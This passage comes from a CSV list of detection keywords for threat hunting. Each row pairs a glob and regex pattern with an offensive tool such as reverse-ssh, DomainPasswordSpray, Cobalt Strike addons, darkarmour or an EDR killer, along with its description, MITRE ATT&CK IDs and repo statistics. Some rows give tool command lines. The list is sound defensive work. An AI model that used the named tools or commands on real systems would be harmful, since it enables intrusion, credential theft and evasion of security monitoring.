tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*dadc9d874254d500356528ea6bfedbe9f8db453c4d64e2dfd7d68f97cd0f973d*",".{0,1000}dadc9d874254d500356528ea6bfedbe9f8db453c4d64e2dfd7d68f97cd0f973d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*DAE3997B-D51B-4D9F-9F11-2EBC6FDDF57C*",".{0,1000}DAE3997B\-D51B\-4D9F\-9F11\-2EBC6FDDF57C.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*dae7d1a42b0bb178bff2ca9729c31d59db045cd65db817cc9eca7a1721bc4c57*",".{0,1000}dae7d1a42b0bb178bff2ca9729c31d59db045cd65db817cc9eca7a1721bc4c57.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*daem0nc0re/PrivFu*",".{0,1000}daem0nc0re\/PrivFu.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*daem0nc0re/VectorKernel*",".{0,1000}daem0nc0re\/VectorKernel.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - 
T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*dafthack/DomainPasswordSpray*",".{0,1000}dafthack\/DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*dafthack/GraphRunner*",".{0,1000}dafthack\/GraphRunner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*dafthack/HostRecon*",".{0,1000}dafthack\/HostRecon.{0,1000}","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. 
or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007 - ","N/A","N/A","Information Gathering","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","5","414","117","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z" "*dafthack/MailSniper*",".{0,1000}dafthack\/MailSniper.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*dafthack/MFASweep*",".{0,1000}dafthack\/MFASweep.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1192","164","2024-01-31T22:52:58Z","2020-09-22T16:25:03Z" "*dafthack/RDPSpray*",".{0,1000}dafthack\/RDPSpray.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*dahvid.schloss@echeloncyber.com*",".{0,1000}dahvid\.schloss\@echeloncyber\.com.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data 
Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*dahvidschloss/PILOT*",".{0,1000}dahvidschloss\/PILOT.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","1","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*DallasFR/Cobalt-Clip*",".{0,1000}DallasFR\/Cobalt\-Clip.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*DallasFR/WinShellcode*",".{0,1000}DallasFR\/WinShellcode.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - 
T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*DAMP-master.zip",".{0,1000}DAMP\-master\.zip","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*DancingRightToLeft.py*",".{0,1000}DancingRightToLeft\.py.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*danielbohannon*",".{0,1000}danielbohannon.{0,1000}","offensive_tool_keyword","Github Username","Github user author of powershell obfuscation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/danielbohannon","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*danielmiessler/SecLists*",".{0,1000}danielmiessler\/SecLists.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*danielmiessler/SecLists.git*",".{0,1000}danielmiessler\/SecLists\.git.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - 
T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*DanMcInerney/Empire*",".{0,1000}DanMcInerney\/Empire.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*DanMcInerney/icebreaker*",".{0,1000}DanMcInerney\/icebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*DanMcInerney/net-creds*",".{0,1000}DanMcInerney\/net\-creds.{0,1000}","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. 
Concatenates fragmented packets and does not rely on ports for service identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","1","N/A","N/A","10","1622","429","2023-11-02T10:46:03Z","2015-01-07T18:47:46Z" "*DanMcInerney/theHarvester*",".{0,1000}DanMcInerney\/theHarvester.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*danti1988/adcshunter*",".{0,1000}danti1988\/adcshunter.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","1","N/A","7","1","76","7","2023-12-15T10:49:39Z","2023-12-14T14:31:05Z" "*daphne-main.zip*",".{0,1000}daphne\-main\.zip.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","15","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*daphne-x64 * pid=*",".{0,1000}daphne\-x64\s.{0,1000}\spid\=.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","0","N/A","8","1","15","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*darkarmour -f *.exe --encrypt xor --jmp --loop 7 -o 
*.exe*",".{0,1000}darkarmour\s\-f\s.{0,1000}\.exe\s\-\-encrypt\sxor\s\-\-jmp\s\-\-loop\s7\s\-o\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*darkarmour.py*",".{0,1000}darkarmour\.py.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*darkarmour-master*",".{0,1000}darkarmour\-master.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*DarkCoderSc/SharpShellPipe*",".{0,1000}DarkCoderSc\/SharpShellPipe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*darkhotel backdoor*",".{0,1000}darkhotel\sbackdoor.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter 
Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*DarkHotel C2*",".{0,1000}DarkHotel\sC2.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*darkhotel data exfil server*",".{0,1000}darkhotel\sdata\sexfil\sserver.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*darkhotel_headers*",".{0,1000}darkhotel_headers.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*DarkLoadLibrary-maser*",".{0,1000}DarkLoadLibrary\-maser.{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","10","990","199","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" "*darkr4y/geacon*",".{0,1000}darkr4y\/geacon.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*DarkRCovery.exe*",".{0,1000}DarkRCovery\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DarkRCovery.exe*",".{0,1000}DarkRCovery\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Darkside.exe -p*",".{0,1000}Darkside\.exe\s\-p.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*Darkside-master.zip*",".{0,1000}Darkside\-master\.zip.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*darkweb2017-top100.txt*",".{0,1000}darkweb2017\-top100\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*DarkWidow-main*",".{0,1000}DarkWidow\-main.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process 
+ PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*das add -db dbname masscan *",".{0,1000}das\sadd\s\-db\sdbname\smasscan\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*das add -db dbname rustscan *",".{0,1000}das\sadd\s\-db\sdbname\srustscan\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*das report -hosts 192.168.1.0/24 -oA report2*",".{0,1000}das\sreport\s\-hosts\s192\.168\.1\.0\/24\s\-oA\sreport2.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*das scan -db dbname -hosts all -oA report1 -nmap '-Pn -sVC -O' 
-parallel*",".{0,1000}das\sscan\s\-db\sdbname\s\-hosts\sall\s\-oA\sreport1\s\-nmap\s\'\-Pn\s\-sVC\s\-O\'\s\-parallel.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*das scan -db dbname -ports 22*80*443*445 -show*",".{0,1000}das\sscan\s\-db\sdbname\s\-ports\s22.{0,1000}80.{0,1000}443.{0,1000}445\s\-show.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dashlane2john.py*",".{0,1000}dashlane2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Data Name=""ServiceName"">chopper*",".{0,1000}Data\sName\=\""ServiceName\""\>chopper\<\/Data\>.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*Data 
Name=""ServiceName"">final_seg*",".{0,1000}Data\sName\=\""ServiceName\""\>final_seg\<\/Data\>.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*Data Name=""ServiceName"">let me in*",".{0,1000}Data\sName\=\""ServiceName\""\>let\sme\sin\<\/Data\>.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*data/implant/*/host.ps1*",".{0,1000}data\/implant\/.{0,1000}\/host\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*data/ipwn*",".{0,1000}data\/ipwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*data/payloads/stager.ps1*",".{0,1000}data\/payloads\/stager\.ps1.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*data/shell/backdoors*",".{0,1000}data\/shell\/backdoors.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*data/shell/stagers*",".{0,1000}data\/shell\/stagers.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*data/wordlist_256.txt*",".{0,1000}data\/wordlist_256\.txt.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to 
create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*data/wordlists*",".{0,1000}data\/wordlists.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security 